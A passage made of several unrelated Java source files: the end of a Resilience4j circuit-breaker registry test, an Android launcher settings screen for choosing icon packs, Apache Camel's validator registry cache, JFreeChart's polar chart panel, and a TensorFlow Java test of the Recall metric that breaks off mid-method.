public void testCreateUsingBuilderWithDefaultAndCustomConfig() {
CircuitBreakerConfig circuitBreakerConfig = CircuitBreakerConfig.custom()
.failureRateThreshold(30f).build();
CircuitBreakerConfig customCircuitBreakerConfig = CircuitBreakerConfig.custom()
.failureRateThreshold(40f).build();
CircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry.custom()
.withCircuitBreakerConfig(circuitBreakerConfig)
.addCircuitBreakerConfig("custom", customCircuitBreakerConfig)
.build();
assertThat(circuitBreakerRegistry.getDefaultConfig()).isNotNull();
assertThat(circuitBreakerRegistry.getDefaultConfig().getFailureRateThreshold())
.isEqualTo(30f);
assertThat(circuitBreakerRegistry.getConfiguration("custom")).isNotEmpty();
}
@Test
public void testCreateUsingBuilderWithNullConfig() {
assertThatThrownBy(
() -> CircuitBreakerRegistry.custom().withCircuitBreakerConfig(null).build())
.isInstanceOf(NullPointerException.class).hasMessage("Config must not be null");
}
@Test
public void testCreateUsingBuilderWithMultipleRegistryEventConsumer() {
CircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry.custom()
.withCircuitBreakerConfig(CircuitBreakerConfig.ofDefaults())
.addRegistryEventConsumer(new NoOpCircuitBreakerEventConsumer())
.addRegistryEventConsumer(new NoOpCircuitBreakerEventConsumer())
.build();
getEventProcessor(circuitBreakerRegistry.getEventPublisher())
.ifPresent(eventProcessor -> assertThat(eventProcessor.hasConsumers()).isTrue());
}
@Test
public void testCreateUsingBuilderWithRegistryTags() {
Map<String, String> circuitBreakerTags = Map.of("key1", "value1", "key2", "value2");
CircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry.custom()
.withCircuitBreakerConfig(CircuitBreakerConfig.ofDefaults())
.withTags(circuitBreakerTags)
.build();
CircuitBreaker circuitBreaker = circuitBreakerRegistry.circuitBreaker("testName");
assertThat(circuitBreaker.getTags()).containsAllEntriesOf(circuitBreakerTags);
}
@Test
public void testCreateUsingBuilderWithRegistryStore() {
CircuitBreakerRegistry circuitBreakerRegistry = CircuitBreakerRegistry.custom()
.withCircuitBreakerConfig(CircuitBreakerConfig.ofDefaults())
.withRegistryStore(new InMemoryRegistryStore<>())
.build();
CircuitBreaker circuitBreaker = circuitBreakerRegistry.circuitBreaker("testName");
CircuitBreaker circuitBreaker2 = circuitBreakerRegistry.circuitBreaker("otherTestName");
assertThat(circuitBreaker).isNotSameAs(circuitBreaker2);
assertThat(circuitBreakerRegistry.getAllCircuitBreakers()).hasSize(2);
}
private static class NoOpCircuitBreakerEventConsumer implements
RegistryEventConsumer<CircuitBreaker> {
@Override
public void onEntryAddedEvent(EntryAddedEvent<CircuitBreaker> entryAddedEvent) {
}
@Override
public void onEntryRemovedEvent(EntryRemovedEvent<CircuitBreaker> entryRemoveEvent) {
}
@Override
public void onEntryReplacedEvent(EntryReplacedEvent<CircuitBreaker> entryReplacedEvent) {
}
}
}
|
|
package g7.bluesky.launcher3.setting;
import android.annotation.TargetApi;
import android.content.Context;
import android.content.Intent;
import android.content.pm.PackageManager;
import android.content.pm.ResolveInfo;
import android.content.res.Configuration;
import android.net.Uri;
import android.os.Build;
import android.os.Bundle;
import android.preference.ListPreference;
import android.preference.Preference;
import android.preference.PreferenceActivity;
import android.preference.PreferenceFragment;
import android.preference.PreferenceManager;
import java.util.ArrayList;
import java.util.List;
import g7.bluesky.launcher3.Launcher;
import g7.bluesky.launcher3.R;
/**
* A {@link PreferenceActivity} that presents a set of application settings. On
* handset devices, settings are presented as a single list. On tablets,
* settings are split by category, with category headers shown to the left of
* the list of settings.
* <p/>
* See <a href="http://developer.android.com/design/patterns/settings.html">
* Android Design: Settings</a> for design guidelines and the <a
* href="http://developer.android.com/guide/topics/ui/settings.html">Settings
* API Guide</a> for more information on developing a Settings UI.
*/
public class SettingsActivity extends PreferenceActivity {
/**
* {@inheritDoc}
*/
@Override
public boolean onIsMultiPane() {
return isXLargeTablet(this);
}
/**
* Helper method to determine if the device has an extra-large screen. For
* example, 10" tablets are extra-large.
*/
private static boolean isXLargeTablet(Context context) {
return (context.getResources().getConfiguration().screenLayout
& Configuration.SCREENLAYOUT_SIZE_MASK) >= Configuration.SCREENLAYOUT_SIZE_XLARGE;
}
/**
* {@inheritDoc}
*/
@Override
@TargetApi(Build.VERSION_CODES.HONEYCOMB)
public void onBuildHeaders(List<Header> target) {
loadHeadersFromResource(R.xml.pref_headers, target);
}
@Override
protected boolean isValidFragment(String fragmentName) {
return GeneralPreferenceFragment.class.getName().equals(fragmentName);
}
/**
* A preference value change listener that updates the preference's summary
* to reflect its new value.
*/
private static Preference.OnPreferenceChangeListener sBindPreferenceSummaryToValueListener = new Preference.OnPreferenceChangeListener() {
@Override
public boolean onPreferenceChange(Preference preference, Object value) {
String stringValue = value.toString();
if (preference instanceof ListPreference) {
// For list preferences, look up the correct display value in
// the preference's 'entries' list.
ListPreference listPreference = (ListPreference) preference;
int index = listPreference.findIndexOfValue(stringValue);
// Set the summary to reflect the new value.
preference.setSummary(
index >= 0
? listPreference.getEntries()[index]
: null);
} else {
// For all other preferences, set the summary to the value's
// simple string representation.
preference.setSummary(stringValue);
}
return true;
}
};
/**
* Binds a preference's summary to its value. More specifically, when the
* preference's value is changed, its summary (line of text below the
* preference title) is updated to reflect the value. The summary is also
* immediately updated upon calling this method. The exact display format is
* dependent on the type of preference.
*
* @see #sBindPreferenceSummaryToValueListener
*/
private static void bindPreferenceSummaryToValue(Preference preference) {
// Set the listener to watch for value changes.
preference.setOnPreferenceChangeListener(sBindPreferenceSummaryToValueListener);
// Trigger the listener immediately with the preference's
// current value.
sBindPreferenceSummaryToValueListener.onPreferenceChange(preference,
PreferenceManager
.getDefaultSharedPreferences(preference.getContext())
.getString(preference.getKey(), ""));
}
/**
* This fragment shows general preferences only. It is used when the
* activity is showing a two-pane settings UI.
*/
@TargetApi(Build.VERSION_CODES.HONEYCOMB)
public static class GeneralPreferenceFragment extends PreferenceFragment {
@Override
public void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
addPreferencesFromResource(R.xml.pref_general);
bindPreferenceSummaryToValue(findPreference(SettingConstants.LAYOUT_PREF_KEY));
bindPreferenceSummaryToValue(findPreference(SettingConstants.THEME_PREF_KEY));
bindPreferenceSummaryToValue(findPreference(SettingConstants.TEXT_COLOR_PREF_KEY));
bindPreferenceSummaryToValue(findPreference(SettingConstants.THEME_OPACITY_PREF_KEY));
// List to select icon pack
final ListPreference lp = (ListPreference) findPreference(SettingConstants.ICON_THEME_PREF_KEY);
// Value to save to preference
final List<String> iconPacksPackageName = new ArrayList<>();
// Value to display lable
final List<String> iconPacksName = new ArrayList<>();
// Value to check if icon is installed
final List<Boolean> iconPacksIsInstalled = new ArrayList<>();
// Default icon
iconPacksName.add("Default");
iconPacksPackageName.add(Launcher.class.getPackage().getName());
iconPacksIsInstalled.add(true);
// Get icon pack used by Apex launcher
PackageManager pm = getActivity().getPackageManager();
final Intent mainIntent = new Intent(Intent.ACTION_MAIN, null);
mainIntent.addCategory("com.anddoes.launcher.THEME");
List<ResolveInfo> installPacks = pm.queryIntentActivities(mainIntent, 0);
if (installPacks != null && installPacks.size() > 0) {
for (ResolveInfo resolveInfo: installPacks) {
iconPacksPackageName.add(resolveInfo.activityInfo.packageName);
iconPacksName.add(resolveInfo.loadLabel(pm).toString());
iconPacksIsInstalled.add(true);
}
}
// Add some default icon if they are not installed
String[] someIconsName = {"nexbit.icons.moonshine===Moonshine", "com.numix.icons_circle===Numix Circle", "com.numix.icons_fold===Numix Fold"};
for (int i = 0; i < someIconsName.length; ++i) {
String tmp[] = someIconsName[i].split("===");
if (! iconPacksPackageName.contains(tmp[0])) {
iconPacksPackageName.add(tmp[0]);
iconPacksName.add("[Install] " + tmp[1]);
iconPacksIsInstalled.add(false);
}
}
// Set default value is system icons
if (lp.getValue() == null) {
lp.setValue(Launcher.class.getPackage().getName());
}
lp.setEntries(iconPacksName.toArray(new String[iconPacksPackageName.size()]));
lp.setEntryValues(iconPacksPackageName.toArray(new String[iconPacksPackageName.size()]));
String selectedIconTheme = getPreferenceManager().getSharedPreferences().getString(SettingConstants.ICON_THEME_PREF_KEY, Launcher.class.getPackage().getName());
int idxOfSelectedIconTheme = iconPacksPackageName.indexOf(selectedIconTheme);
if (idxOfSelectedIconTheme != -1 && idxOfSelectedIconTheme < iconPacksName.size()) {
lp.setSummary(iconPacksName.get(idxOfSelectedIconTheme));
}
lp.setOnPreferenceChangeListener(new Preference.OnPreferenceChangeListener() {
@Override
public boolean onPreferenceChange(Preference preference, Object newValue) {
String iconTheme = newValue.toString();
int idxOfIconTheme = iconPacksPackageName.indexOf(iconTheme);
if (idxOfIconTheme != -1 && idxOfIconTheme < iconPacksIsInstalled.size()) {
// If icon pack is installed then set to preference else go to Play store
if (iconPacksIsInstalled.get(idxOfIconTheme)) {
lp.setSummary(iconPacksName.get(idxOfIconTheme));
getActivity().finish();
return true;
} else {
startActivity(new Intent(Intent.ACTION_VIEW, Uri.parse("https://play.google.com/store/apps/details?id=" + iconTheme)));
getActivity().finish();
}
}
return false;
}
});
}
}
}
|
|
/**
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.apache.camel.impl;
import java.util.ArrayList;
import java.util.Collection;
import java.util.LinkedHashSet;
import java.util.List;
import java.util.Map;
import java.util.Set;
import java.util.concurrent.ConcurrentHashMap;
import java.util.concurrent.ConcurrentMap;
import org.apache.camel.CamelContext;
import org.apache.camel.impl.validator.ValidatorKey;
import org.apache.camel.model.validator.ValidatorDefinition;
import org.apache.camel.spi.DataType;
import org.apache.camel.spi.Validator;
import org.apache.camel.spi.ValidatorRegistry;
import org.apache.camel.util.CamelContextHelper;
import org.apache.camel.util.LRUCache;
import org.apache.camel.util.ObjectHelper;
import org.apache.camel.util.ServiceHelper;
/**
* Default implementation of {@link org.apache.camel.spi.ValidatorRegistry}.
*/
public class DefaultValidatorRegistry extends LRUCache<ValidatorKey, Validator> implements ValidatorRegistry<ValidatorKey> {
private static final long serialVersionUID = 1L;
private ConcurrentMap<ValidatorKey, Validator> staticMap;
private final CamelContext context;
public DefaultValidatorRegistry(CamelContext context) throws Exception {
this(context, new ArrayList<>());
}
public DefaultValidatorRegistry(CamelContext context, List<ValidatorDefinition> definitions) throws Exception {
// do not stop on eviction, as the validator may still be in use
super(CamelContextHelper.getMaximumValidatorCacheSize(context), CamelContextHelper.getMaximumValidatorCacheSize(context), false);
// static map to hold validator we do not want to be evicted
this.staticMap = new ConcurrentHashMap<>();
this.context = context;
for (ValidatorDefinition def : definitions) {
Validator validator = def.createValidator(context);
context.addService(validator);
put(new ValidatorKey(new DataType(def.getType())), validator);
}
}
public Validator resolveValidator(ValidatorKey key) {
Validator answer = get(key);
if (answer == null && ObjectHelper.isNotEmpty(key.getType().getName())) {
answer = get(new ValidatorKey(new DataType(key.getType().getModel())));
}
return answer;
}
@Override
public void start() throws Exception {
resetStatistics();
}
@Override
public Validator get(Object o) {
// try static map first
Validator answer = staticMap.get(o);
if (answer == null) {
answer = super.get(o);
} else {
hits.incrementAndGet();
}
return answer;
}
@Override
public Validator put(ValidatorKey key, Validator validator) {
// at first we must see if the key already exists and then replace it back, so it stays the same spot
Validator answer = staticMap.remove(key);
if (answer != null) {
// replace existing
staticMap.put(key, validator);
return answer;
}
answer = super.remove(key);
if (answer != null) {
// replace existing
super.put(key, validator);
return answer;
}
// we want validators to be static if they are part of setting up or starting routes
if (context.isSetupRoutes() || context.isStartingRoutes()) {
answer = staticMap.put(key, validator);
} else {
answer = super.put(key, validator);
}
return answer;
}
@Override
public void putAll(Map<? extends ValidatorKey, ? extends Validator> map) {
// need to use put instead of putAll to ensure the entries gets added to either static or dynamic map
for (Map.Entry<? extends ValidatorKey, ? extends Validator> entry : map.entrySet()) {
put(entry.getKey(), entry.getValue());
}
}
@Override
public boolean containsKey(Object o) {
return staticMap.containsKey(o) || super.containsKey(o);
}
@Override
public boolean containsValue(Object o) {
return staticMap.containsValue(o) || super.containsValue(o);
}
@Override
public int size() {
return staticMap.size() + super.size();
}
public int staticSize() {
return staticMap.size();
}
@Override
public int dynamicSize() {
return super.size();
}
@Override
public boolean isEmpty() {
return staticMap.isEmpty() && super.isEmpty();
}
@Override
public Validator remove(Object o) {
Validator answer = staticMap.remove(o);
if (answer == null) {
answer = super.remove(o);
}
return answer;
}
@Override
public void clear() {
staticMap.clear();
super.clear();
}
@Override
public Set<ValidatorKey> keySet() {
Set<ValidatorKey> answer = new LinkedHashSet<>();
answer.addAll(staticMap.keySet());
answer.addAll(super.keySet());
return answer;
}
@Override
public Collection<Validator> values() {
Collection<Validator> answer = new ArrayList<>();
answer.addAll(staticMap.values());
answer.addAll(super.values());
return answer;
}
@Override
public Set<Entry<ValidatorKey, Validator>> entrySet() {
Set<Entry<ValidatorKey, Validator>> answer = new LinkedHashSet<>();
answer.addAll(staticMap.entrySet());
answer.addAll(super.entrySet());
return answer;
}
@Override
public int getMaximumCacheSize() {
return super.getMaxCacheSize();
}
/**
* Purges the cache
*/
@Override
public void purge() {
// only purge the dynamic part
super.clear();
}
@Override
public boolean isStatic(DataType type) {
return staticMap.containsKey(new ValidatorKey(type));
}
@Override
public boolean isDynamic(DataType type) {
return super.containsKey(new ValidatorKey(type));
}
@Override
public void stop() throws Exception {
ServiceHelper.stopServices(staticMap.values());
ServiceHelper.stopServices(values());
purge();
}
@Override
public String toString() {
return "ValidatorRegistry for " + context.getName() + ", capacity: " + getMaxCacheSize();
}
}
|
|
/* ===========================================================
* JFreeChart : a free chart library for the Java(tm) platform
* ===========================================================
*
* (C) Copyright 2000-2007, by Object Refinery Limited and Contributors.
*
* Project Info: http://www.jfree.org/jfreechart/index.html
*
* This library is free software; you can redistribute it and/or modify it
* under the terms of the GNU Lesser General Public License as published by
* the Free Software Foundation; either version 2.1 of the License, or
* (at your option) any later version.
*
* This library is distributed in the hope that it will be useful, but
* WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY
* or FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public
* License for more details.
*
* You should have received a copy of the GNU Lesser General Public
* License along with this library; if not, write to the Free Software
* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301,
* USA.
*
* [Java is a trademark or registered trademark of Sun Microsystems, Inc.
* in the United States and other countries.]
*
* --------------------
* PolarChartPanel.java
* --------------------
* (C) Copyright 2004, 2007, by Solution Engineering, Inc. and Contributors.
*
* Original Author: Daniel Bridenbecker, Solution Engineering, Inc.;
* Contributor(s): David Gilbert (for Object Refinery Limited);
*
* $Id: PolarChartPanel.java,v 1.2.2.2 2007/02/02 15:53:36 mungady Exp $
*
* Changes
* -------
* 19-Jan-2004 : Version 1, contributed by DB with minor changes by DG (DG);
* ------------- JFREECHART 1.0.x ---------------------------------------------
* 02-Feb-2007 : Removed author tags all over JFreeChart sources (DG);
*
*/
package org.jfree.chart;
import java.awt.Component;
import java.awt.event.ActionEvent;
import javax.swing.JMenuItem;
import javax.swing.JPopupMenu;
import org.jfree.chart.plot.Plot;
import org.jfree.chart.plot.PolarPlot;
/**
* <code>PolarChartPanel</code> is the top level object for using the
* {@link PolarPlot}. Since this class has a <code>JPanel</code> in the
* inheritance hierarchy, one uses this class to integrate the Polar plot into
* their application.
* <p>
* The main modification to <code>ChartPanel</code> is the popup menu. It
* removes <code>ChartPanel</code>'s versions of:
* <ul>
* <li><code>Zoom In</code></li>
* <li><code>Zoom Out</code></li>
* <li><code>Auto Range</code></li>
* </ul>
* and replaces them with versions more appropriate for {@link PolarPlot}.
*/
public class PolarChartPanel extends ChartPanel {
// -----------------
// --- Constants ---
// -----------------
/** Zoom in command string. */
private static final String POLAR_ZOOM_IN_ACTION_COMMAND = "Polar Zoom In";
/** Zoom out command string. */
private static final String POLAR_ZOOM_OUT_ACTION_COMMAND
= "Polar Zoom Out";
/** Auto range command string. */
private static final String POLAR_AUTO_RANGE_ACTION_COMMAND
= "Polar Auto Range";
// ------------------------
// --- Member Variables ---
// ------------------------
// --------------------
// --- Constructors ---
// --------------------
/**
* Constructs a JFreeChart panel.
*
* @param chart the chart.
*/
public PolarChartPanel(JFreeChart chart) {
this(chart, true);
}
/**
* Creates a new panel.
*
* @param chart the chart.
* @param useBuffer buffered?
*/
public PolarChartPanel(JFreeChart chart, boolean useBuffer) {
super(chart, useBuffer);
checkChart(chart);
setMinimumDrawWidth(200);
setMinimumDrawHeight(200);
setMaximumDrawWidth(2000);
setMaximumDrawHeight(2000);
}
// --------------------------
// --- ChartPanel Methods ---
// --------------------------
/**
* Sets the chart that is displayed in the panel.
*
* @param chart The chart.
*/
public void setChart(JFreeChart chart) {
checkChart(chart);
super.setChart(chart);
}
/**
* Creates a popup menu for the panel.
*
* @param properties include a menu item for the chart property editor.
* @param save include a menu item for saving the chart.
* @param print include a menu item for printing the chart.
* @param zoom include menu items for zooming.
*
* @return The popup menu.
*/
protected JPopupMenu createPopupMenu(boolean properties,
boolean save,
boolean print,
boolean zoom) {
JPopupMenu result = super.createPopupMenu(properties, save, print, zoom);
int zoomInIndex = getPopupMenuItem(result, "Zoom In");
int zoomOutIndex = getPopupMenuItem(result, "Zoom Out");
int autoIndex = getPopupMenuItem(result, "Auto Range");
if (zoom) {
JMenuItem zoomIn = new JMenuItem("Zoom In");
zoomIn.setActionCommand(POLAR_ZOOM_IN_ACTION_COMMAND);
zoomIn.addActionListener(this);
JMenuItem zoomOut = new JMenuItem("Zoom Out");
zoomOut.setActionCommand(POLAR_ZOOM_OUT_ACTION_COMMAND);
zoomOut.addActionListener(this);
JMenuItem auto = new JMenuItem("Auto Range");
auto.setActionCommand(POLAR_AUTO_RANGE_ACTION_COMMAND);
auto.addActionListener(this);
if (zoomInIndex != -1) {
result.remove(zoomInIndex);
}
else {
zoomInIndex = result.getComponentCount() - 1;
}
result.add(zoomIn, zoomInIndex);
if (zoomOutIndex != -1) {
result.remove(zoomOutIndex);
}
else {
zoomOutIndex = zoomInIndex + 1;
}
result.add(zoomOut, zoomOutIndex);
if (autoIndex != -1) {
result.remove(autoIndex);
}
else {
autoIndex = zoomOutIndex + 1;
}
result.add(auto, autoIndex);
}
return result;
}
/**
* Handles action events generated by the popup menu.
*
* @param event the event.
*/
public void actionPerformed(ActionEvent event) {
String command = event.getActionCommand();
if (command.equals(POLAR_ZOOM_IN_ACTION_COMMAND)) {
PolarPlot plot = (PolarPlot) getChart().getPlot();
plot.zoom(0.5);
}
else if (command.equals(POLAR_ZOOM_OUT_ACTION_COMMAND)) {
PolarPlot plot = (PolarPlot) getChart().getPlot();
plot.zoom(2.0);
}
else if (command.equals(POLAR_AUTO_RANGE_ACTION_COMMAND)) {
PolarPlot plot = (PolarPlot) getChart().getPlot();
plot.getAxis().setAutoRange(true);
}
else {
super.actionPerformed(event);
}
}
// ----------------------
// --- Public Methods ---
// ----------------------
// -----------------------
// --- Private Methods ---
// -----------------------
/**
* Test that the chart is using an xy plot with time as the domain axis.
*
* @param chart the chart.
*/
private void checkChart(JFreeChart chart) {
Plot plot = chart.getPlot();
if (!(plot instanceof PolarPlot)) {
throw new IllegalArgumentException("plot is not a PolarPlot");
}
}
/**
* Returns the index of an item in a popup menu.
*
* @param menu the menu.
* @param text the label.
*
* @return The item index.
*/
private int getPopupMenuItem(JPopupMenu menu, String text) {
int index = -1;
for (int i = 0; (index == -1) && (i < menu.getComponentCount()); i++) {
Component comp = menu.getComponent(i);
if (comp instanceof JMenuItem) {
JMenuItem item = (JMenuItem) comp;
if (text.equals(item.getText())) {
index = i;
}
}
}
return index;
}
}
|
|
/* Copyright 2020 The TensorFlow Authors. All Rights Reserved.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
=======================================================================*/
package org.tensorflow.framework.metrics;
import static org.junit.jupiter.api.Assertions.assertThrows;
import java.util.Random;
import org.junit.jupiter.api.Test;
import org.tensorflow.Operand;
import org.tensorflow.framework.utils.TestSession;
import org.tensorflow.ndarray.Shape;
import org.tensorflow.op.Op;
import org.tensorflow.op.Ops;
import org.tensorflow.types.TFloat32;
public class RecallTest {
private final TestSession.Mode tfMode = TestSession.Mode.GRAPH;
private final Random random = new Random();
@Test
public void testValueIsIdempotent() {
try (TestSession session = TestSession.createTestSession(tfMode)) {
Ops tf = session.getTF();
Recall<TFloat32> instance = new Recall<>(new float[] {0.3f, 0.72f}, 1001L, TFloat32.class);
Operand<TFloat32> predictions =
tf.random.statelessRandomUniform(
tf.constant(Shape.of(10, 3)), tf.constant(new long[] {1L, 0L}), TFloat32.class);
Operand<TFloat32> labels =
tf.random.statelessRandomUniform(
tf.constant(Shape.of(10, 3)), tf.constant(new long[] {1L, 0L}), TFloat32.class);
Op update = instance.updateState(tf, labels, predictions, null);
for (int i = 0; i < 10; i++) session.run(update);
Operand<TFloat32> initialRecall = instance.result(tf, TFloat32.class);
for (int i = 0; i < 10; i++)
session.evaluate(initialRecall, instance.result(tf, TFloat32.class));
}
}
@Test
public void testUnweighted() {
try (TestSession session = TestSession.createTestSession(tfMode)) {
Ops tf = session.getTF();
Recall<TFloat32> instance = new Recall<>(1001L, TFloat32.class);
Operand<TFloat32> predictions = tf.constant(new float[][] {{1, 0, 1, 0}});
Operand<TFloat32> labels = tf.constant(new float[][] {{0, 1, 1, 0}});
Op update = instance.updateState(tf, labels, predictions, null);
session.run(update);
session.evaluate(0.5f, instance.result(tf, TFloat32.class));
}
}
private int[][] generateRandomArray(int dim1, int dim2, int maxInt) {
int[][] result = new int[dim1][dim2];
for (int i = 0; i < dim1; i++) {
for (int j = 0; j < dim2; j++) {
result[i][j] = random.nextInt(maxInt);
}
}
return result;
}
@Test
public void testUnweightedAllIncorrect() {
try (TestSession session = TestSession.createTestSession(tfMode)) {
Ops tf = session.getTF();
Recall<TFloat32> instance = new Recall<>(1001L, TFloat32.class);
int[][] array = generateRandomArray(100, 1, 2);
Operand<TFloat32> predictions = tf.dtypes.cast(tf.constant(array), TFloat32.class);
Operand<TFloat32> labels =
tf.dtypes.cast(tf.math.sub(tf.constant(1), tf.constant(array)), TFloat32.class);
Op update = instance.updateState(tf, labels, predictions, null);
session.run(update);
session.evaluate(0.f, instance.result(tf, TFloat32.class));
}
}
@Test
public void testWeighted() {
try (TestSession session = TestSession.createTestSession(tfMode)) {
Ops tf = session.getTF();
Recall<TFloat32> instance = new Recall<>(1001L, TFloat32.class);
Operand<TFloat32> predictions =
tf.constant(
new float[][] {
{1, 0, 1, 0},
{0, 1, 0, 1}
});
Operand<TFloat32> labels =
tf.constant(
new float[][] {
{0, 1, 1, 0},
{1, 0, 0, 1}
});
Operand<TFloat32> sampleWeights =
tf.constant(
new float[][] {
{1, 2, 3, 4},
{4, 3, 2, 1}
});
Op update = instance.updateState(tf, labels, predictions, sampleWeights);
session.run(update);
float weightedTp = 3.0f + 1.0f;
float weightedT = (2.0f + 3.0f) + (4.0f + 1.0f);
float expectedRecall = weightedTp / weightedT;
session.evaluate(expectedRecall, instance.result(tf, TFloat32.class));
}
}
@Test
public void testDivByZero() {
try (TestSession session = TestSession.createTestSession(tfMode)) {
Ops tf = session.getTF();
Recall<TFloat32> instance = new Recall<>(1001L, TFloat32.class);
Operand<TFloat32> predictions = tf.constant(new float[] {0, 0, 0, 0});
Operand<TFloat32> labels = tf.constant(new float[] {0, 0, 0, 0});
Op update = instance.updateState(tf, labels, predictions, null);
session.run(update);
session.evaluate(0f, instance.result(tf, TFloat32.class));
}
}
@Test
public void testUnweightedWithThreshold() {
try (TestSession session = TestSession.createTestSession(tfMode)) {
Ops tf = session.getTF();
Recall<TFloat32> instance = new Recall<>(new float[] {0.5f, 0.7f}, 1001L, TFloat32.class);
Operand<TFloat32> predictions = tf.constant(new float[][] {{1, 0, 0.6f, 0}});
Operand<TFloat32> labels = tf.constant(new float[][] {{0, 1, 1, 0}});
Op update = instance.updateState(tf, labels, predictions, null);
session.run(update);
Float[] expected = new Float[] {0.5f, 0f};
session.evaluate(expected, instance.result(tf, TFloat32.class));
}
}
@Test
public void testWeightedWithThreshold() {
try (TestSession session = TestSession.createTestSession(tfMode)) {
Ops tf = session.getTF();
Recall<TFloat32> instance = new Recall<>(new float[] {0.5f, 1.f}, 1001L, TFloat32.class);
Operand<TFloat32> labels = tf.constant(new float[][] {{0, 1}, {1, 0}});
Operand<TFloat32> predictions = tf.constant(new float[][] {{1, 0}, {0.6f, 0}});
Operand<TFloat32> weights = tf.constant(new float[][] {{1, 4}, {3, 2}});
Op update = instance.updateState(tf, labels, predictions, weights);
session.run(update);
float weightedTp = 0 + 3.f;
float weightedPositives = (0 + 3.f) + (4.f + 0.f);
float expectedRecall = weightedTp / weightedPositives;
float[] expected = new float[] {expectedRecall, 0f};
session.evaluate(expected, instance.result(tf, TFloat32.class));
}
}
@Test
public void testMultipleUpdates() {
try (TestSession session = TestSession.createTestSession(tfMode)) {
Ops tf = session.getTF();
Recall<TFloat32> instance = new Recall<>(new float[] {0.5f, 1.f}, 1001L, TFloat32.class);
Operand<TFloat32> labels = tf.constant(new float[][] {{0, 1}, {1, 0}});
Operand<TFloat32> predictions = tf.constant(new float[][] {{1, 0}, {0.6f, 0}});
Operand<TFloat32> weights = tf.constant(new float[][] {{1, 4}, {3, 2}});
Op update = instance.updateState(tf, labels, predictions, weights);
for (int i = 0; i < 2; i++) session.run(update);
float weightedTp = (0f + 3.f) + (0f + 3.f);
float weightedPositives = ((0f + 3.f) + (4.f + 0.f)) + ((0f + 3.f) + (4.f + 0.f));
float expectedRecall = weightedTp / weightedPositives;
float[] expected = new float[] {expectedRecall, 0f};
session.evaluate(expected, instance.result(tf, TFloat32.class));
}
}
@Test
public void testUnweightedTopK() {
try (TestSession session = TestSession.createTestSession(tfMode)) {
Ops tf = session.getTF();
Recall<TFloat32> instance = new Recall<>(null, null, 3, null, 1001L, TFloat32.class);
Operand<TFloat32> labels = tf.constant(new float[][] {{0f, 1f, 1f, 0f, 0f}});
Operand<TFloat32> predictions = tf.constant(new float[][] {{0.2f, 0.1f, 0.5f, 0f, 0.2f}});
Op update = instance.updateState(tf, labels, predictions, null);
session.run(update);
session.evaluate(0.5f, instance.result(tf, TFloat32.class));
}
}
@Test
public void testWeightedTopK() {
try (TestSession session = TestSession.createTestSession(tfMode)) {
Ops tf = session.getTF();
Recall<TFloat32> instance = new Recall<>(null, null, 3, null, 1001L, TFloat32.class);
Operand<TFloat32> labels = tf.constant(new float[][] {{0, 1, 1, 0, 1}});
Operand<TFloat32> predictions = tf.constant(new float[][] {{0.2f, 0.1f, 0.4f, 0f, 0.2f}});
Operand<TFloat32> weights = tf.constant(new float[][] {{1, 4, 2, 3, 5}});
Op update = instance.updateState(tf, labels, predictions, weights);
session.run(update);
labels = tf.constant(new float[][] {{1, 0, 1, 1, 1}});
predictions = tf.constant(new float[][] {{0.2f, 0.6f, 0.4f, 0.2f, 0.2f}});
weights = tf.constant(3.f);
update = instance.updateState(tf, labels, predictions, weights);
session.run(update);
float weightedTp = (2 + 5) + (3 + 3);
float weightedPositives = (4 + 2 + 5) + (3 + 3 + 3 + 3);
float expectedRecall = weightedTp / weightedPositives;
session.evaluate(expectedRecall, instance.result(tf, TFloat32.class));
}
}
@Test
public void testUnweightedClassId() {
try (TestSession session = TestSession.createTestSession(tfMode)) {
Ops tf = session.getTF();
Recall<TFloat32> instance = new Recall<>(null, null, null, 2, 1001L, TFloat32.class);
Operand<TFloat32> predictions = tf.constant(new float[][] {{0.2f, 0.1f, 0.6f, 0f, 0.2f}});
Operand<TFloat32> labels = tf.constant(new float[][] {{0, 1, 1, 0, 0}});
Op update = instance.updateState(tf, labels, predictions, null);
session.run(update);
session.evaluate(1f, instance.result(tf, TFloat32.class));
session.evaluate(1f, instance.getTruePositives());
session.evaluate(0f, instance.getFalseNegatives());
predictions = tf.constant(new float[][] {{0.2f, 0.1f, 0f, 0f, 0.2f}});
labels = tf.constant(new float[][] {{0, 1, 1, 0, 0}});
update = instance.updateState(tf, labels, predictions, null);
session.run(update);
session.evaluate(0.5f, instance.result(tf, TFloat32.class));
session.evaluate(1f, instance.getTruePositives());
session.evaluate(1f, instance.getFalseNegatives());
predictions = tf.constant(new float[][] {{0.2f, 0.1f, 0.6f, 0f, 0.2f}});
labels = tf.constant(new float[][] {{0, 1, 0, 0, 0}});
update = instance.updateState(tf, labels, predictions, null);
session.run(update);
session.evaluate(0.5f, instance.result(tf, TFloat32.class));
session.evaluate(1f, instance.getTruePositives());
session.evaluate(1f, instance.getFalseNegatives());
}
}
@Test
public void testUnweightedTopKAndClassId() {
try (TestSession session = TestSession.createTestSession(tfMode)) {
Ops tf = session.getTF();
Recall<TFloat32> instance = new Recall<>(null, null, 2, 2, 1001L, TFloat32.class);
Operand<TFloat32> predictions = tf.constant(new float[][] {{0.2f, 0.6f, 0.3f, 0, 0.2f}});
Operand<TFloat32> labels = tf.constant(new float[][] {{0, 1, 1, 0, 0}});
Op update = instance.updateState(tf, labels, predictions, null);
session.run(update);
